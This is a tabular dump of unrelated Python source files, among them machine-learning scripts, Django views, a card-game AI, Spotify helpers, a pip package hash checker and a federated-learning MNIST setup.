text stringlengths 8 6.05M |
|---|
import numpy as np
x_train = [
[1,2,3,4,5,None, None, None, 9, 10, 11],
[2,3,4,5,6, None, None, None, 10, 11, 12],
[50,51,52,53,54, None, None, None, 58, 59, 60]]
y_train = [[6, 7, 8], [7,8,9], [55, 56, 57]]
x_test = [[35,36,37,38,39, None, None, None, 43, 44, 45]]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
print(x_train.shape)
print(y_train.shape)
print(x_test.shape)
x_train = x_train.reshape(-1, 11, 1)
x_test = x_test.reshape(-1, 11, 1)
from keras.models import Sequential
from keras.layers import LSTM, Dense
model = Sequential()
model.add(LSTM(50, input_shape = (11,1), activation='relu'))
# model.add(Dense(10, activation='relu'))
# model.add(Dense(512, activation='relu'))
# model.add(Dense(32, activation='relu'))
# model.add(Dense(16, activation='relu'))
model.add(Dense(3, activation='relu'))
model.compile(optimizer='adam', loss='mse', metrics=['mse'])
model.fit(x_train, y_train, epochs=30, batch_size=1, verbose=2)
pred = model.predict(x_test, batch_size=1)
print(pred) |
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QRect, QPoint
from PyQt5.QtGui import QBrush
class TextBox (QRect):
def __init__(self, parent, border=False, width=10, height=10, text=""):
super(TextBox, self).__init__()
self.parent = parent
self.setText(text)
self.border = border
def setText(self, txt):
self.lines = []
content = txt.split('\n')
for c in content:
self.lines.append(c.strip())
# adapt text box area to text length
self.setWidth(self.maxLineLength()*64)
self.setHeight(self.numLines()*16)
def getSize(self):
return self.size
def maxLineLength(self):
"""
Returns number of caracters
in longest line
"""
l = []
for line in self.lines:
l.append(len(self.lines))
return max(l)
def numLines(self):
"""
Returns number of lines in text box
"""
return len(self.lines)
def hasBorder(self):
return self.border
def draw(self, painter):
if (self.hasBorder()):
# draw bounding rect
painter.setPen(Qt.black)
painter.setBrush(QBrush(Qt.white))
painter.drawRect(self)
# draw text
dy = self.height()/len(self.lines)
x = self.x()+3
y = self.y()+self.height()-3
#self.parent.y()+4*self.parent.y()/5+self.height()+self.height()-3
for line in self.lines[::-1]:
painter.drawText(QPoint(x,y), line)
y -= dy
|
from django.db.models import Q
from django.shortcuts import render
from service.models import Service
from forum.models import Topic, Post
def search(request):
zapros = request.GET.get('zapros')
service_search = Service.objects.filter(
Q(title__contains=zapros) |
Q(description__contains=zapros)
)
forum_search = Topic.objects.filter(Q(title__contains=zapros))
context = {
'zapros': zapros, 'service_search': service_search,
'forum_search': forum_search,
}
return render(request, 'search/search.html', context) |
#!/usr/bin/python
##
# Example builind script
# @author : Devresse Adrien
# @version : v0.2
# @date 21/03/2011
Import('*') # import SConstruct exported var
import os
import random
import shutil
import commands
src = ['example/gfal_testrw.c']
src2 = ['example/gfal_testread.c']
src3 = ['example/gfal_testdir.c']
src4 = ['example/gfal_testchmod.c']
src5 = ['example/gfal_testcreatedir.c']
src6 = ['example/gfal_teststat.c']
src7 = ['example/gfal_testget.c']
old_suffix=""
env_testing = env.Clone()
if ARGUMENTS.get('old_mode','0') =='yes':
env_testing.Append(LIBS="gfal")
env_testing.Append(CFLAGS="-D_GFAL_1_X")
env_testing["CPPPATH"] = old_gfal_header
old_suffix="_old"
else:
env_testing.Append(LIBS="gfal2")
env_testing.Program("build/gfal_testrw"+old_suffix, src)
env_testing.Program("build/gfal_testread"+old_suffix, src2)
env_testing.Program("build/gfal_testdir"+old_suffix, src3)
env_testing.Program("build/gfal_testchmod"+old_suffix, src4)
env_testing.Program("build/gfal_testcreatedir"+old_suffix, src5)
env_testing.Program("build/gfal_teststat"+old_suffix, src6)
env_testing.Program("build/gfal_testget"+old_suffix, src7)
|
# Distance traveled
# Calculation for traveled distance
# Anatoli Penev
# 27.10.1017
car_speed = 60 # the speed the car is moving in miles
time1 = 5 # 5 hours of travel time
time2 = 8 # 8 hours of travel time
time3 = 12 # 12 hours of travel time
distance1 = car_speed*time1 # calculate distance traveled for 5 hours
distance2 = car_speed*time2 # calculate distance traveled for 8 hours
distance3 = car_speed*time3 # calculate distance traveled for 12 hours
print("Distance traveled for 5 hours", distance1) # distance traveled for 5 hours
print("Distance traveled for 8 hours", distance2) # distance traveled for 8 hours
print("Distance traveled for 12 hours", distance3) #distance traveled for 12 hours
|
# -*- coding: utf-8 -*-
class Solution:
def search(self, nums, target):
first, last = 0, len(nums) - 1
while first <= last:
mid = (first + last) // 2
if nums[mid] == target:
return mid
elif (nums[first] <= nums[mid] and nums[first] <= target < nums[mid]) or (
nums[first] > nums[mid] and not (nums[mid] < target <= nums[last])
):
last = mid - 1
else:
first = mid + 1
return -1
if __name__ == "__main__":
solution = Solution()
assert 4 == solution.search([4, 5, 6, 7, 0, 1, 2], 0)
assert -1 == solution.search([4, 5, 6, 7, 0, 1, 2], 3)
|
import sys, random
from observer import Observer
from card import Cards, CardSet
from log import Log
class Agent:
def __init__(self, player, names):
self.player = player
self.name = names[player]
self.observer = Observer(names)
self.cards = []
def __str__(self):
return self.name
def start_game(self):
self.observer.start_game()
def start_round(self, card):
self.observer.start_round(self.player, card)
self.cards = [card]
def report_draw(self, card):
self.observer.report_draw(self.player, card)
self.cards.append(card)
def end_round(self, cards, winner):
self.observer.end_round(cards, winner)
def end_game(self, winner):
pass
def report_play(self, *k, **kw):
self.observer.report_play(*k, **kw)
player = kw['player']
card = kw['card']
target = kw.get('target', None)
discard = kw.get('discard', None)
new_card = kw.get('new_card', None)
other_card = kw.get('other_card', None)
loser = kw.get('loser', None)
if self.player == player:
self.cards.remove(card)
if target is not None and not self.observer.players[target].handmaiden:
if card == Cards.BARON and self.player == loser:
self.cards.remove(discard)
elif card == Cards.PRINCE and self.player == target:
self.cards.remove(discard)
self.cards.append(new_card)
elif card == Cards.KING and self.player in (player, target):
del self.cards[0]
self.cards.append(other_card)
def _get_required_play(self):
if Cards.COUNTESS in self.cards:
if Cards.PRINCE in self.cards or Cards.KING in self.cards:
return {'card': Cards.COUNTESS}
return None
class LowballAgent(Agent):
def __init__(self, player, names):
super(LowballAgent, self).__init__(player, names)
def start_round(self, card):
super(LowballAgent, self).start_round(card)
Log.print('ai: %s starts with card %s' % (self.name, Cards.name(card)))
def report_draw(self, card):
super(LowballAgent, self).report_draw(card)
Log.print('ai: %s draws card %s' % (self.name, Cards.name(card)))
def report_play(self, *k, **kw):
super(LowballAgent, self).report_play(*k, **kw)
card = kw['card']
player = kw['player']
target = kw.get('target', None)
if target and not self.observer.players[target].handmaiden:
if player == self.player:
if card == Cards.PRIEST:
Log.print('ai: %s has card %s' % (self.observer.players[target], Cards.name(kw['other_card'])))
elif card == Cards.KING:
Log.print('ai: %s now has card %s' % (self.name, Cards.name(kw['other_card'])))
elif target == self.player:
if card == Cards.BARON and kw.get('loser', None) == self.player:
Log.print('ai: Winning card was %s' % Cards.name(kw['other_card']))
elif card == Cards.PRINCE and kw['discard'] != Cards.PRINCESS:
Log.print('ai: %s draws card %s' % (self.name, Cards.name(kw['new_card'])))
elif card == Cards.KING:
Log.print('ai: %s now has card %s' % (self.name, Cards.name(kw['other_card'])))
def _most_likely(self, exclude_card=None):
lst = []
for player in self.observer.players:
if player.number != self.player and not player.out:
(card, certainty) = player.cards.most_likely(exclude_card)
lst.append((player, card, certainty))
random.shuffle(lst)
lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
lst = sorted(lst, key=lambda x: x[2], reverse=True)
lst = sorted(lst, key=lambda x: x[0].handmaiden)
Log.print('ai: Hand probabilities:')
for l in lst:
Log.print('ai: %s: %s (%i%% chance) %s' % (l[0].name, Cards.name(l[1]), l[2] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
winner = lst[0]
Log.print('ai: %s has most certain hand (%i%% chance of card %s)' % (winner[0].name, winner[2] * 100, Cards.name(winner[1])))
return winner
def _least_likely(self, exclude_card=None):
lst = []
for player in self.observer.players:
if player.number != self.player and not player.out:
(card, certainty) = player.cards.most_likely(exclude_card)
lst.append((player, card, certainty))
random.shuffle(lst)
lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
lst = sorted(lst, key=lambda x: x[2])
lst = sorted(lst, key=lambda x: x[0].handmaiden)
Log.print('ai: Hand probabilities:')
for l in lst:
Log.print('ai: %s: %s (%i%% chance) %s' % (l[0].name, Cards.name(l[1]), l[2] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
winner = lst[0]
Log.print('ai: %s has least certain hand (%i%% chance of card %s)' % (winner[0].name, winner[2] * 100, Cards.name(winner[1])))
return winner
def _most_likely_less_than(self, card):
lst = []
for player in self.observer.players:
if player.number != self.player and not player.out:
certainty = player.cards.chance_less_than(card)
lst.append((player, certainty))
random.shuffle(lst)
lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
lst = sorted(lst, key=lambda x: x[1], reverse=True)
lst = sorted(lst, key=lambda x: x[0].handmaiden)
Log.print('ai: Probabilities that hand is less than %s:' % Cards.name(card))
for l in lst:
Log.print('ai: %s: %i%% %s' % (l[0].name, l[1] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
winner = lst[0]
Log.print('ai: %s has best chance (%i%%)' % (winner[0].name, winner[1] * 100))
return winner
def _highest_expected_value(self):
lst = []
for player in self.observer.players:
if player.number != self.player and not player.out:
value = player.cards.expected_value()
lst.append((player, value))
random.shuffle(lst)
lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
lst = sorted(lst, key=lambda x: x[1], reverse=True)
lst = sorted(lst, key=lambda x: x[0].handmaiden)
Log.print('ai: Expected hand values:')
for l in lst:
Log.print('ai: %s: %f %s' % (l[0].name, l[1], '(HANDMAIDEN)' if l[0].handmaiden else ''))
winner = lst[0]
Log.print('ai: %s has highest expected hand value %f' % (winner[0].name, winner[1]))
return winner
def get_play(self):
Log.print('ai: %s play options: %s %s' % (self.name, Cards.name(self.cards[0]), Cards.name(self.cards[1])))
self.observer.print_state('ai')
ret = self._get_required_play()
if not ret:
cards = sorted(self.cards)
card = cards[0]
other_card = cards[1]
ret = {'card': card}
if card == Cards.GUARD:
(player, card, certainty) = self._most_likely(exclude_card=Cards.GUARD)
if other_card == Cards.HANDMAIDEN and certainty < 1:
ret['card'] = Cards.HANDMAIDEN
else:
ret['target'] = player.number
ret['challenge'] = card
elif card == Cards.PRIEST:
(player, card, certainty) = self._least_likely()
if other_card == Cards.HANDMAIDEN:
ret['card'] = Cards.HANDMAIDEN
else:
ret['target'] = player.number
elif card == Cards.BARON:
(player, certainty) = self._most_likely_less_than(other_card)
if other_card == Cards.HANDMAIDEN and certainty < 1:
ret['card'] = Cards.HANDMAIDEN
else:
ret['target'] = player.number
elif card in (Cards.PRINCE, Cards.KING):
(player, value) = self._highest_expected_value()
ret['target'] = player.number
return ret
class EndgameAgent(LowballAgent):
def get_play(self):
if self.observer.deck_size <= len(self.observer.players):
if Cards.PRINCE in self.cards:
other_card = self.cards[0] if self.cards[1] == Cards.PRINCE else self.cards[1]
deck_value = self.observer.deck_set.expected_value()
if deck_value > other_card and deck_value > Cards.PRINCE:
ret = {'card' : Cards.PRINCE, 'target' : self.player }
return ret
else:
values = [(i, player.cards.expected_value()) for (i, player) in enumerate(self.observer.players)]
values = sorted(values, key=lambda x: x[1], reverse=True)
for (i, value) in values:
if self.observer.players[i].out or i == self.player:
continue
if value > deck_value:
ret = {'card' : Cards.PRINCE, 'target' : i}
return ret
elif Cards.KING in self.cards:
other_card = self.cards[0] if self.cards[1] == Cards.KING else self.cards[1]
values = [(i, player.cards.expected_value()) for (i, player) in enumerate(self.observer.players)]
values = sorted(values, key=lambda x: x[1], reverse=True)
for (i, value) in values:
if self.observer.players[i].out or i == self.player:
continue
if value > other_card and value > Cards.KING:
ret = {'card' : Cards.KING, 'target' : i}
return ret
return super(EndgameAgent, self).get_play()
class ConsoleAgent(Agent):
def __init__(self, player, names):
super(ConsoleAgent, self).__init__(player, names)
Log.enable('report', stripped=True)
def start_round(self, card):
super(ConsoleAgent, self).start_round(card)
print()
print('%s starts with card %s' % (self.name, Cards.name(card)))
self.discarded = [0 for i in range(Cards.NUM_CARDS)]
def report_draw(self, card):
super(ConsoleAgent, self).report_draw(card)
print('%s draws card %s' % (self.name, Cards.name(card)))
def report_play(self, *k, **kw):
super(ConsoleAgent, self).report_play(*k, **kw)
player = kw['player']
card = kw['card']
self.discarded[card] += 1
target = kw.get('target', None)
discard = kw.get('discard', None)
if discard:
self.discarded[discard] += 1
if target:
if not self.observer.players[target].handmaiden:
if card == Cards.PRIEST:
other_card = kw.get('other_card', None)
if other_card:
print('%s has card %s' % (self.observer.players[target], Cards.name(other_card)))
elif card == Cards.BARON:
loser = kw.get('loser', None)
if loser is not None:
other_card = kw.get('other_card', None)
if other_card:
print('Winning card was %s' % Cards.name(other_card))
elif card == Cards.PRINCE:
new_card = kw.get('new_card', None)
if new_card:
print('%s draws new card %s' % (self.observer.players[target], Cards.name(new_card)))
elif card == Cards.KING:
other_card = kw.get('other_card', None)
if other_card:
print('%s now has card %s' % (self.observer.players[target], Cards.name(other_card)))
def get_play(self):
card = None
self.cards = sorted(self.cards)
play = {}
print()
s = ' '.join(['%s(%i)' % (player.name, player.score) for player in self.observer.players if not player.out])
print('Players still in round: %s' % s)
s = ' '.join('%s(%i)' % (Cards.name(card), self.discarded[card]) for card in range(Cards.NUM_CARDS) if self.discarded[card] > 0)
print('Discarded cards: %s' % s)
while card is None:
print('Available cards are [%i] %s [%i] %s' % (self.cards[0], Cards.name(self.cards[0]), self.cards[1], Cards.name(self.cards[1])))
print('Enter selection: ', end='')
sys.stdout.flush()
line = sys.stdin.readline().strip()
if line.startswith('enable'):
Log.enable(line.split(' ')[1])
continue
elif line.startswith('disable'):
Log.disable(line.split(' ')[1])
continue
try:
c = int(line)
if c in self.cards:
card = c
except ValueError:
pass
if card is None:
print(' Invalid selection')
elif card in (Cards.PRINCE, Cards.KING) and Cards.COUNTESS in self.cards:
print(' Must discard COUNTESS')
card = None
play['card'] = card
if card in (Cards.GUARD, Cards.PRIEST, Cards.BARON, Cards.PRINCE, Cards.KING):
players = []
for player in self.observer.players:
if player.out:
continue
if player.number == self.player and card != Cards.PRINCE:
continue
players.append(player)
target = None
while target is None:
print()
s = ' '.join(['[%i] %s' % (player.number + 1, player.name) for player in players])
print('Players: %s' % s)
print('Enter target player: ', end='')
sys.stdout.flush()
try:
t = int(sys.stdin.readline()) - 1
if t in range(len(self.observer.players)) and self.observer.players[t] in players:
target = t
except IndexError:
pass
except ValueError:
pass
if target is None:
print(' Invalid selection')
play['target'] = target
if card == Cards.GUARD:
challenge = None
while challenge is None:
print()
s = ' '.join(['[%i] %s' % (card, Cards.name(card)) for card in range(Cards.GUARD, Cards.NUM_CARDS)])
print('Cards: %s' % s)
print('Enter challenge card: ', end='')
sys.stdout.flush()
try:
c = int(sys.stdin.readline())
if c in range(Cards.GUARD, Cards.NUM_CARDS):
challenge = c
except ValueError:
pass
if challenge is None:
print(' Invalid selection')
play['challenge'] = challenge
return play
class RandomAgent(Agent):
def get_play(self):
ret = self._get_required_play()
if not ret:
ret = {}
cards = list(self.cards)
if Cards.PRINCESS in cards:
cards.remove(Cards.PRINCESS)
card = random.choice(cards)
ret['card'] = card
if card in (Cards.GUARD, Cards.PRIEST, Cards.BARON, Cards.PRINCE, Cards.KING):
players = [i for i in range(len(self.observer.players)) if not self.observer.players[i].out]
if card != Cards.PRINCE:
players.remove(self.player)
target = random.choice(players)
ret['target'] = target
if card == Cards.GUARD:
ret['challenge'] = random.choice(range(Cards.PRIEST, Cards.NUM_CARDS))
return ret
|
from django.contrib.auth.models import Group, User
def user_is_moderator(user: User):
if not user.is_authenticated:
return False
group = Group.objects.get(name="moderators")
return group in user.groups.all()
|
import tensorflow as tf
import os
from PIL import Image
import numpy as np
import string
class GenerateTFRecord:
'''
Convert the image to binary records and store them in TFRecord format.
It is efficient to read data.
'''
def __init__(self, labels):
self.labels = labels
def _convert_image_folder(self, img_folder, tfreocrd_file_name):
img_folder_paths = os.listdir(img_folder)
img_folder_paths.sort()
writer = tf.python_io.TFRecordWriter(tfreocrd_file_name)
for folder in img_folder_paths:
folder_path = os.path.join(img_folder, folder)
imgs = sorted(os.listdir(folder_path))
imgs = [os.path.abspath(os.path.join(folder_path, i)) for i in imgs] # get the absolute path of every image
for img in imgs:
example = self._convert_image(img)
writer.write(example.SerializeToString())
writer.close()
def _convert_image(self, img_path):
label = self._get_label_with_filename(img_path)
img = Image.open(img_path)
img_int = np.array(img, dtype=np.int64)
img_shape = img_int.shape
assert img_shape == (100, 100)
filename = os.path.basename(img_path)
# Read image data in terms of bytes
with tf.gfile.GFile(img_path, 'rb') as fid:
image_data = fid.read()
example = tf.train.Example(features=tf.train.Features(feature={
'filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf-8')])), # if not encode, raise TypeError: '0000_0_0_size_30_angle_0.png' has type str, but expected one of: bytes
'rows': tf.train.Feature(int64_list=tf.train.Int64List(value=[img_shape[0]])),
'cols': tf.train.Feature(int64_list=tf.train.Int64List(value=[img_shape[1]])),
'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_data])),
'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[label]))
}))
return example
def _get_label_with_filename(self, filename):
basename = os.path.basename(filename).split('.')[0]
basename = basename.split('_')[2]
return self.labels[basename]
if __name__ == '__main__':
digits = list(string.digits)
letter_uppercase = list(string.ascii_uppercase)
keys = digits + letter_uppercase
labels = {k: v for v, k in enumerate(keys)}
t = GenerateTFRecord(labels)
t._convert_image_folder('hologram_image', 'images_gfile.tfrecord')
|
# -*- coding: utf-8 -*-
import random
ST=[]
t=0
while t<4 :
tem=str(random.randrange(0,9))
if not (tem in ST):
ST.append(tem)
t+=1
#宣告一個ST
#存放亂數產生要猜的一組不重覆的四位數{
time=1
while True:
print ("猜第%d次。\n請輸入一個不重覆的四位數字或輸入'STOP'以退出遊戲:" %time)
A=0
B=0
input_s=input()
if "STOP" in input_s.upper():
print ("離開遊戲! 正確答案為 %s" % "".join(str(n) for n in ST))
break
else:
try:
int(input_s)
#測試是否輸入的為數字,若非會產生列外處理
if "".join(str(n) for n in ST)==input_s:
#猜到數字,結束遊戲
print ("Good Job!! 共猜了 %d 次") %time
break
elif len(input_s) != 4:
print ("錯誤! 不正確的長度!\n")
else:
#未猜到,計算與目標數字的差異
for tem in range(4):
if ST[tem] == input_s[tem]:
#包括、且位置相符
A+=1
if input_s[tem] in ST:
#計算包括的數字,所以需再減去A的總合,才是僅包括,但位置不同的數量
B+=1
print ("%d A\t%d B"% (A,B-A))
time+=1
except:
print ("錯誤! 內含非數字的字串\n")
system("pause")
|
from 基于文本内容的垃圾短信识别.data_process import data_process
from wordcloud import WordCloud
import matplotlib.pyplot as plt
data_str, data_after_stop, labels = data_process()
# 词频统计
word_fre = {}
for i in data_after_stop[labels == 0]:
for j in i:
if j not in word_fre.keys():
word_fre[j] = 1
else:
word_fre[j] += 1
# 绘制词云
mask = plt.imread('./data/duihuakuan.jpg')
wc = WordCloud(font_path='/usr/share/fonts/opentype/noto/NotoSerifCJK-Medium.ttc',mask=mask,background_color='white')
wc.fit_words(word_fre)
plt.imshow(wc)
plt.axis('off')
plt.show()
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
path('', include('portalBase.urls')),
path('portalHome/', include('portalBase.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
path('phDAdmission/', include('phDAdmissionPortal.urls'), name = "phDAdmission"),
path('yourApp/', include('yourApp.urls'), name = "yourApp"),
] |
"""
Abandon hope all ye who enter the depths of this module
""" |
import spotipy
import spotipy.util as util
import config
MASTER_SCOPE = """user-library-read
playlist-read-private
user-library-modify
playlist-modify-public
user-read-recently-played
user-read-private
user-read-email
playlist-modify-private
streaming
user-top-read
user-read-birthdate
playlist-read-collaborative
user-modify-playback-state
user-follow-modify
user-read-currently-playing
user-read-playback-state
user-follow-read"""
def get_spotify_client():
token = util.prompt_for_user_token(
config.USERNAME,
MASTER_SCOPE,
client_id=config.CLIENT_ID,
client_secret=config.CLIENT_SECRET,
redirect_uri=config.REDIRECT_URI
)
sp = spotipy.Spotify(auth=token)
return SpotifyClient(sp)
class SpotifyClient(object):
def __init__(self, sp):
self.sp = sp
def get_all_saved_tracks(self):
offset = 0
limit = 50
ret = []
while True:
results = self.sp.current_user_saved_tracks(limit=limit, offset=offset)
if len(results['items']) == 0:
break
ret.extend([item['track']['uri'] for item in results['items']])
offset += limit
return ret
def get_all_owned_playlists(self):
"""Returns dict mapping playlist name to URI."""
offset = 0
limit = 50
ret = {}
while True:
results = self.sp.user_playlists(config.USERNAME, limit=limit, offset=offset)
if len(results['items']) == 0:
break
for item in results['items']:
owner = item['owner']['id']
if owner == config.USERNAME:
ret[item['name']] = item['uri']
offset += limit
return ret
def get_all_songs_in_playlist(self, playlist):
offset = 0
limit = 100
uris = []
dates = []
while True:
results = self.sp.user_playlist_tracks(
config.USERNAME, playlist_id=playlist, limit=limit, offset=offset)
if len(results['items']) == 0:
break
uris.extend([item['track']['uri'] for item in results['items']])
dates.extend([item['added_at'].split('T')[0] for item in results['items']])
offset += limit
return uris, dates
def add_tracks_to_playlist(self, playlist, tracks):
self.sp.user_playlist_add_tracks(config.USERNAME, playlist, tracks)
def remove_tracks_from_playlist(self, playlist, tracks):
self.sp.user_playlist_remove_all_occurrences_of_tracks(config.USERNAME, playlist, tracks)
def remove_tracks_from_all_playlists(self, playlists, tracks):
for playlist in playlists:
self.remove_tracks_from_playlist(playlist, tracks)
|
import os
import re
import shutil
import subprocess
import get_package_info
import Retrieve_Hash_Custom_PIP_Package
import numpy as np
from colorama import Fore, Style, Back, init
def find_check_package(package=None):
found_package = None
package_info = get_package_info.get_package_info(package=package)
if package_info is None:
print("\nThere is no package matching the search for \"" + package + "\" \n")
return None
elif len(package_info[:, 0]) == 1: # number of package found
package_version = package_info[0][1]
found_package = (package, package_version)
return found_package
else:
is_in_package_list = package in package_info[:, 0]
if not is_in_package_list:
print("\nMore than one package were found for " + package + " " + "package, please write the full name "
"of the package within the following "
+ str(len(package_info[:, 0])) + " packages:\n ")
else:
print("\nThe package " + package + " has been found but several packages can match this name, please "
"confirm the full name of the package you want to check within the "
"following "
+ str(len(package_info[:, 0])) + " packages:\n\n ")
max_len = 0
for package_name in package_info[:, 0]:
max_len = max(max_len, len(package_name))
str_to_print = ""
for pack_ind, package_name in enumerate(package_info[:, 0]):
if pack_ind % 2 == 0:
str_to_print = package_name + " " * (max_len - len(package_name) + 2)
if pack_ind == len(package_info[:, 0]) - 1:
print(str_to_print)
else:
str_to_print = str_to_print + package_name
print(str_to_print)
print("")
print(">> ", end='')
new_package = input()
if is_in_package_list:
if new_package == package:
index = np.where(package_info[:, 0] == package)[0][0]
package_version = package_info[index][1]
found_package = (package, package_version)
return found_package
else:
found_package = find_check_package(package=new_package)
return found_package
else:
found_package = find_check_package(package=new_package)
return found_package
def download_pip_package(package_name, package_version=None, download_dir='download_dir',
already_downloaded_package=None):
if already_downloaded_package is not None:
return os.getcwd() + "/" + already_downloaded_package
try:
os.makedirs(download_dir)
except FileExistsError as err:
pass
for filename in os.listdir(download_dir):
file_path = os.path.join(download_dir, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
try:
os.chdir(download_dir)
subprocess.check_call('pip download --no-deps ' + package_name + '==' + package_version, shell=True)
os.chdir('../')
except Exception:
print("A problem occurred while downloading the package " + package_name + " in version " + package_version)
return None
print("")
return os.getcwd() + "/" + download_dir + "/" + os.listdir(download_dir)[0]
def check_package(package=None, download_dir='download_dir', already_downloaded_package=None, debug=False, keep=False,
diff=False, listing=False):
package_info = find_check_package(package)
if package_info is None:
return 0
package_name, package_version = package_info[0], package_info[1]
cmd = "pip show " + package_name + " | egrep \"^Location\""
byte_out = subprocess.check_output(cmd, shell=True)
string_out = byte_out.decode("utf-8")
package_location = re.sub(r"\s", "", string_out.split(" ")[1])
print("\nThe check for package " + package_name + " at version " + str(
package_version) + " has started\n")
legitimate_package = download_pip_package(package_name, package_version, download_dir, already_downloaded_package)
if already_downloaded_package is not None:
print("Checking with the folowing legitimate package: ")
print(already_downloaded_package)
print("")
if debug:
print("Legitimate package downloaded at " + legitimate_package)
extraction_directory = Retrieve_Hash_Custom_PIP_Package.extract_package_current_directory(package_name,
legitimate_package,
debug=debug)
hash_file_name, extracted_folder_name = Retrieve_Hash_Custom_PIP_Package.compute_hashes_legit_package(extraction_directory)
legit_files, corrupted_files, unknown_file, path_to_corrupted_files = Retrieve_Hash_Custom_PIP_Package.compute_hashes_package_installed(
package_location, package_name, hash_file_name, extraction_directory, debug=debug)
if diff:
Retrieve_Hash_Custom_PIP_Package.compute_differences(package_name, extraction_directory, corrupted_files,
path_to_corrupted_files, extracted_folder_name, debug=debug)
if not keep:
Retrieve_Hash_Custom_PIP_Package.delete_temp_extraction_directory(debug=debug)
if debug or listing:
print(Fore.GREEN + "Legitimate files:"+Style.RESET_ALL)
if len(legit_files) == 0:
print('None')
else:
print(*legit_files, sep = ", ")
print(Fore.RED)
print("Corrupted files:"+Style.RESET_ALL)
if len(corrupted_files) == 0:
print('None')
else:
print(*corrupted_files, sep = ", ")
print(Fore.YELLOW)
print("Unknown files:"+Style.RESET_ALL)
if len(unknown_file) == 0:
print('None')
else:
print(*unknown_file, sep = ", ")
print("")
init(autoreset=True)
if len(corrupted_files) > 0:
print(Fore.RED + Style.BRIGHT + Back.LIGHTBLACK_EX + "RESULTS: Some corrupted files were found:")
print(*corrupted_files, sep=',')
print(Style.RESET_ALL)
else:
print(Fore.GREEN + Style.BRIGHT +Back.LIGHTBLACK_EX + "RESULTS: No corrupted file has been found" + Style.RESET_ALL + "\n")
return 0
|
from django.shortcuts import redirect, render
from .forms import PostForm
from .models import Volunteer
def volunteers(request):
if not request.user.is_authenticated:
return redirect('/register')
else:
volunteer_list = Volunteer.objects.order_by('-date')
context = {'volunteer_list': volunteer_list}
return render(request, 'volunteers/volunteers.html', context)
def register(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save()
post.save()
return redirect('/message')
else:
form = PostForm()
return render(request, 'volunteers/register.html', {'form': form})
def message(request):
return render(request, 'volunteers/message.html') |
def main():
try:
nimi = input("Syötä tiedoston nimi: ")
tiedostomuuttuja = open(nimi, "r")
n = sum(1 for line in open(nimi))
rivi = "dummy"
i = 1
while i <= n:
rivi = tiedostomuuttuja.readline()
rivi = rivi.rstrip()
print (i, rivi)
i = i +1
tiedostomuuttuja.close()
except FileNotFoundError:
print("Virhe tiedoston lukemisessa.")
except PermissionError:
print("Virhe tiedoston lukemisessa.")
except FileExistsError:
print("Virhe tiedoston lukemisessa.")
main() |
"""Author: Akash Shah (ass502)
unittest for test_grades method in the calculate module"""
from calculate import *
from unittest import TestCase
class GradesTest(TestCase):
def test_static_grades(self):
self.assertEqual(test_grades(['A','A','A']),0)
self.assertEqual(test_grades(['B']),0)
def test_increasing_grades(self):
self.assertEqual(test_grades(['C','B','A']),1)
self.assertEqual(test_grades(['B','C','B','A']),1)
def test_decreasing_grades(self):
self.assertEqual(test_grades(['A','B','C']),-1)
self.assertEqual(test_grades(['A','B','C','B']),-1) |
import os
import argparse
import datetime
from copy import deepcopy
import traceback
import numpy as np
import torch
import torch.nn as nn
import torch.multiprocessing as mp
from torch.optim import SGD
from torch.utils.data import DataLoader
from omegaconf import OmegaConf
import ruamel.yaml
yaml = ruamel.yaml.YAML()
from loguru import logger
import tensorboardX as tbx
from tqdm import tqdm
import itertools
import _init_paths
from clients.base import BaseClient
from servers.gncfl import GNByzantineClusteredFederatedLearning as GNCFL
from datasets.mnist import MnistDataset
from utils.general import seed_everything, get_lr, load_conf
from utils.data import get_mnist_data
from utils.data_split import sorted_split, random_split
from schedulers.alpha_scheduler import *
class CNN(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 32, 5)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d((2, 2))
self.conv2 = nn.Conv2d(32, 32, 5)
self.fc1 = nn.Linear(800, 256)
self.fc2 = nn.Linear(256, 10)
def forward(self, x):
x = self.conv1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.conv2(x)
x = self.relu(x)
x = self.maxpool(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
def setup_dataset(cfg):
# MNISTデータの読み込み
train_img, train_label, test_img, test_label = get_mnist_data("../data/mnist")
img_channel = 1
# データの分割
n_shards = cfg.n_clients * cfg.shards_per_client
if cfg.iid:
train_img, train_label = random_split(train_img, train_label, n_shards=n_shards)
else:
train_img, train_label = sorted_split(train_img, train_label, n_shards=n_shards)
assert n_shards == len(train_img)
clients_shards_indice = np.split(np.random.choice(n_shards, n_shards, replace=False), cfg.n_clients)
train_img = [np.concatenate(train_img[idx], axis=0) for idx in clients_shards_indice]
train_label = [np.concatenate(train_label[idx], axis=0) for idx in clients_shards_indice]
assert len(train_img) == cfg.n_clients
return train_img, train_label, test_img, test_label, img_channel
def setup_client(cfg, train_img, train_label, img_channel):
# -- client setup --
clients = []
for images, labels in zip(train_img, train_label):
model = CNN()
optimizer = SGD(model.parameters(), lr=cfg.lr)
criterion = torch.nn.CrossEntropyLoss()
dataset = MnistDataset(images, labels, 32)
dataloader = DataLoader(
dataset,
batch_size=cfg.batch_size,
shuffle=True,
pin_memory=True,
num_workers=0,
drop_last=True
)
client = BaseClient(
model=model,
optimizer=optimizer,
criterion=criterion,
dataloader=dataloader,
)
clients.append(client)
return clients
